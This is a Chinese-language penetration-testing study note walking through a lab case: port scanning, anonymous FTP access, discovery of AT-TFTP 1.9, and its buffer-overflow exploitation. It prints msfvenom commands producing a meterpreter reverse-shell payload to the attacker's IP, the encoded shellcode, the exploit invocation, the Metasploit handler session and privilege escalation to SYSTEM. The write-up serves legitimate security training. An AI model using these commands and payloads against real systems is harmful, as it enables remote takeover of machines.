渗透测试学习笔记之案例五

0x00 前言

今天这篇文章主要来分享一个在渗透测试过程中如何通过逐步收集信息并最终拿下目标主机的案例。

0x01 案例分析

实验环境:

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程:

首先进行服务和端口扫描,如下:

# nmap -sT -Pn 10.11.1.226

Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CST
Nmap scan report for 10.11.1.226
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE
21/tcp   open   ftp
3389/tcp closed ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 35.58 seconds
可见,目标主机开启了ftp和RDP服务。简单测试一下发现,ftp可以匿名登录。

# ftp 10.11.1.226
Connected to 10.11.1.226.
220-exploitme
220 Please enter your name:
Name (10.11.1.226:root): anonymous
331 User name okay, Need password.
Password:
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (468 bytes).
-rwxrw-rw- 1 root  root        0 Dec 24  2009 AUTOEXEC.BAT
-rwxrw-rw- 1 root  root        0 Dec 24  2009 CONFIG.SYS
drwxrw-rw- 1 root  root        0 Sep 19  2011 Documents and Settings
drwxrw-rw- 1 root  root        0 Dec 24  2009 ftproot
drwxrw-rw- 1 root  root        0 Dec 27  2012 Program Files
drwxrw-rw- 1 root  root        0 Jun 16  2016 Python26
drwxrw-rw- 1 root  root        0 Apr 20  2016 WINDOWS
drwxrw-rw- 1 root  root        0 Dec 24  2009 wmpub
226 Transfer successful.
ftp> cd "Documents and Settings"
250 "/Documents and Settings" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (108 bytes).
drwxrw-rw- 1 root  root        0 Dec 24  2009 All Users
drwxrw-rw- 1 root  root        0 Aug 18  2015 joe
226 Transfer successful.
ftp> cd joe
250 "/Documents and Settings/joe" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (401 bytes).
drwxrw-rw- 1 root  root        0 Aug 18  2015 .idlerc
drwxrw-rw- 1 root  root        0 Dec 24  2009 Cookies
drwxrw-rw- 1 root  root        0 Aug 18  2015 Desktop
drwxrw-rw- 1 root  root        0 Sep 19  2011 Favorites
drwxrw-rw- 1 root  root        0 Sep 19  2011 My Documents
drwxrw-rw- 1 root  root        0 Dec 23  2009 Start Menu
-rwxrw-rw- 1 root  root        0 Dec 23  2009 Sti_Trace.log
226 Transfer successful.
ftp> cd Desktop
250 "/Documents and Settings/joe/Desktop" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (130 bytes).
-rwxrw-rw- 1 root  root      694 Dec 24  2009 GuildFTPd FTP Deamon.lnk
-rwxrw-rw- 1 root  root     2417 Dec  8  2015 servers.py
226 Transfer successful.
ftp> cat servers.py 
?Invalid command
ftp> type servers.py 
servers.py: unknown mode
ftp> get servers.py 
local: servers.py remote: servers.py
200 PORT command successful.
150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).
226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).
2417 bytes received in 0.01 secs (413.8064 kB/s)
ftp>
在ftp的目录里发现了一个有趣的文件“servers.py”,因此下载并查看此文件。
# cat servers.py 
import wmi, time, ftplib, tftpy

print "[*] Start"
print ""

def isFTPworking():
    print "[*] Checking FTP connection..."
    try:
        ftp = ftplib.FTP('10.11.1.226', timeout=5)
        ftp.login()
    except:
        print "[!] FTP not working!!"
        return False
    print "[*] FTP is working."
    return True

def isTFTPworking():
    print "[*] Checking TFTP connection..."
    try:
        tftp = tftpy.TftpClient('10.11.1.226', 69)
        tftp.download("C:/windows/temp/test.txt","C:/windows/temp/test2.txt")
    except:
        print "[!] TFTP not working!!"
        return False
    print "[*] TFTP is working."
    return True

def killProcess(processname):
    print "[*] Killing process: " + processname
    try:
        c = wmi.WMI()
        for process in c.Win32_Process():
            if process.Name == processname:
                process.Terminate()
    except:
        print "[!] Exception while killing process"
    return True

def startProcess(processpath):
    print "[*] Creating process: " + processpath
    try:
        c = wmi.WMI()
        pid, result = c.Win32_Process.Create(processpath)
    except IOError:
        print "[*] Exception while creating process " + processpath
    return

def isProcessAlive(processname):
    print "[*] Checking process: " + processname
    check = False
    try:
        c = wmi.WMI()
        for process in c.Win32_Process():
            if process.Name == processname:
                check = True
        if not check:
            return False
    except:
        print "[!] Exception while using wmi interface"
    return True

if __name__ == '__main__':
    ftpproc   = 'GuildFTPd.exe'
    tftpproc  = 'tftpd.exe'
    processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"',
                 'tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}
    while True:
        for processname in processes.keys():
            if not isProcessAlive(processname):
                startProcess(processes[processname])
        if not isFTPworking():
            killProcess(ftpproc)
            time.sleep(5)
            startProcess(processes[ftpproc])
        if not isTFTPworking():
            killProcess(tftpproc)
            time.sleep(5)
            startProcess(processes[tftpproc])
        time.sleep(30)
很显然,这是一个用来启动ftp和tftp服务的python脚本。回想起前面我们的扫描结果显示目标主机确实开启了ftp服务,于是猜想可能就是和该脚本有关。从上面的代码可以判断,目标主机安装了AT-TFTP server 1.9。扫描TFTP的端口69(UDP)发现确实是开放的。
# nmap -sU -Pn -p 69 10.11.1.226

Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CST
Nmap scan report for 10.11.1.226
Host is up (0.12s latency).

PORT   STATE SERVICE
69/udp open  tftp
MAC Address: 00:50:56:89:7B:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds

Google搜索发现AT-TFTP 1.9存在一个缓冲区溢出的RCE漏洞:

于是,利用下面的步骤生成meterpreter的反弹shell的shellcode,并替换利用脚本atftp.py中相应的shellcode代码:

# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payload
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 177 bytes
# cat stackadj payload > shellcode
# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 210 (iteration=0)
x86/shikata_ga_nai chosen with final size 210
Payload size: 210 bytes
Final size of python file: 1020 bytes
buf =  ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"
buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"
buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"
buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"
buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"
buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"
buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"
buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"
buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"
buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"
buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"
buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"
buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"
buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"
buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"
buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"
buf += "\x50\x7f"

开启MSF的监听,并执行利用脚本。

# python atftp.py 10.11.1.226 69 10.11.0.74 9
接着,我们成功地获得了一个meterpreter的反弹shell,如下:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcp
payload => windows/meterpreter/reverse_nonx_tcp
msf exploit(handler) > set LHOST 10.11.0.74
LHOST => 10.11.0.74
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.11.0.74:4444 
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (171583 bytes) to 10.11.1.226
[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                     Information    Connection
  --  ----                     -----------    ----------
  1   meterpreter x86/windows  JOE\joe @ JOE  10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)
迁移当前的meterpreter(PID 3716)至一个稳定的进程vmtoolsd.exe(PID 1776), 然后执行getsystem命令进行提权。最终,我们成功地获得了一个SYSTEM权限的meterpreter反弹shell。

渗透测试学习笔记之案例五_第1张图片

0x02 小结

总结一下该案例的渗透思路如下:

  • 首先进行服务和端口扫描
  • 接着检测到ftp可匿名登录并进一步发现有价值的脚本文件
  • 猜测并验证目标系统开启了有漏洞的tftp服务
  • 修改漏洞利用代码并尝试利用
  • 最终获得反弹shell并成功提权

你可能感兴趣的:(【信息安全】,信安)